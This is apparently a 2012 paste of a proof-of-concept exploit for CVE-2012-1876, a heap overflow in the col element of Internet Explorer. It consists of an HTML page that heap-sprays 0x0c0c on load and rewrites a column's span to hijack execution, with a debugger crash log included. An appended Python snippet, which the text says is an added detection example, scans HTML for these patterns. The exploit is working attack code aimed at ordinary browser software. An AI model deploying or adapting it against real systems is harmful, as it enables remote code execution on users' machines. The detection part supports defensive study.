CVE-2012-1876 PoC

a guest
Jul 8th, 2012
<html>
<head>
<title>CVE-2012-1876 PoC</title>
</head>
<body onload="_crash()">
<TABLE style="table-layout: fixed;">
    <colgroup id="cg" width="2021161">
    <col id="cl" span="2">
    <col>
    </colgroup>
    <TR>
        <TD>XXXX</TD>
    </TR>
</TABLE>
<script>
/*******
CVE-2012-1876 IE col element heap overflow PoC
Canberk Bolat - cbolat.blogspot.com

cg's width = 2021161 (2021161 * 100 = 0c0c0c04) (Blink->Flink = cg's width)

(1014.1158): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
0c0c0c0c 0c0c            or      al,0Ch
1:019> !heap -x 0c0c0c0c
List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted

List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted

List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted

ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
**********/

var targetObj = document.getElementById("cl");

function spray() {
    for(S="\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=["\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c\u0c0c" + S.substr(60) +"\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141\u4141"].join("")
}

function _crash() {
spray();
//alert("OK");
targetObj.chOff = 10;
targetObj.span = 400;
}
</script>
</body>
</html>
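As an added detection example, not part of the original paste, the Python below flags HTML where a col/colgroup width attribute, multiplied by the factor of 100 the comment above describes, lands in a heap-spray-style address window and where script rewrites a col element's span at runtime. The sample HTML, the address window and the span threshold are constructed assumptions for illustration.

```python
import re

# Constructed sample mirroring the structure of the PoC above; not the page's file.
SUSPECT_HTML = """<table style="table-layout: fixed;">
<colgroup id="cg" width="2021161"><col id="cl" span="2"><col></colgroup>
<tr><td>XXXX</td></tr></table>
<script>
var t = document.getElementById("cl");
function go() { t.chOff = 10; t.span = 400; }
</script>"""

BENIGN_HTML = """<table><colgroup width="120"><col span="2"></colgroup>
<tr><td>ok</td></tr></table>"""

# Assumed window covering 0x0a0a0a0a..0x0f0f0f0f style addresses used by
# classic IE heap sprays; the PoC's 0x0c0c0c04 falls inside it.
SPRAY_LOW, SPRAY_HIGH = 0x0A0A0A0A, 0x0F0F0F0F

TAG_RE = re.compile(r"<(col|colgroup)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
SPAN_RE = re.compile(r"\.span\s*=\s*(\d+)")

def col_widths(html):
    """Return (tag, id, width) for every <col>/<colgroup> with a numeric width."""
    out = []
    for m in TAG_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(2))}
        if attrs.get("width", "").isdigit():
            out.append((m.group(1).lower(), attrs.get("id", ""), int(attrs["width"])))
    return out

def suspicious_widths(html):
    """Widths whose value * 100 (the layout unit the PoC relies on) lands in the spray window."""
    return [(tag, cid, w, w * 100) for tag, cid, w in col_widths(html)
            if SPRAY_LOW <= w * 100 <= SPRAY_HIGH]

def script_span_writes(html, threshold=100):
    """Runtime writes of a large value to a col element's span property (threshold is assumed)."""
    return [int(n) for n in SPAN_RE.findall(html) if int(n) > threshold]

def assess(html):
    """Combine both heuristics; flag only when a spray-like width and a span rewrite co-occur."""
    widths = suspicious_widths(html)
    spans = script_span_writes(html)
    return {"spray_like_widths": widths, "span_writes": spans,
            "flag": bool(widths) and bool(spans)}
```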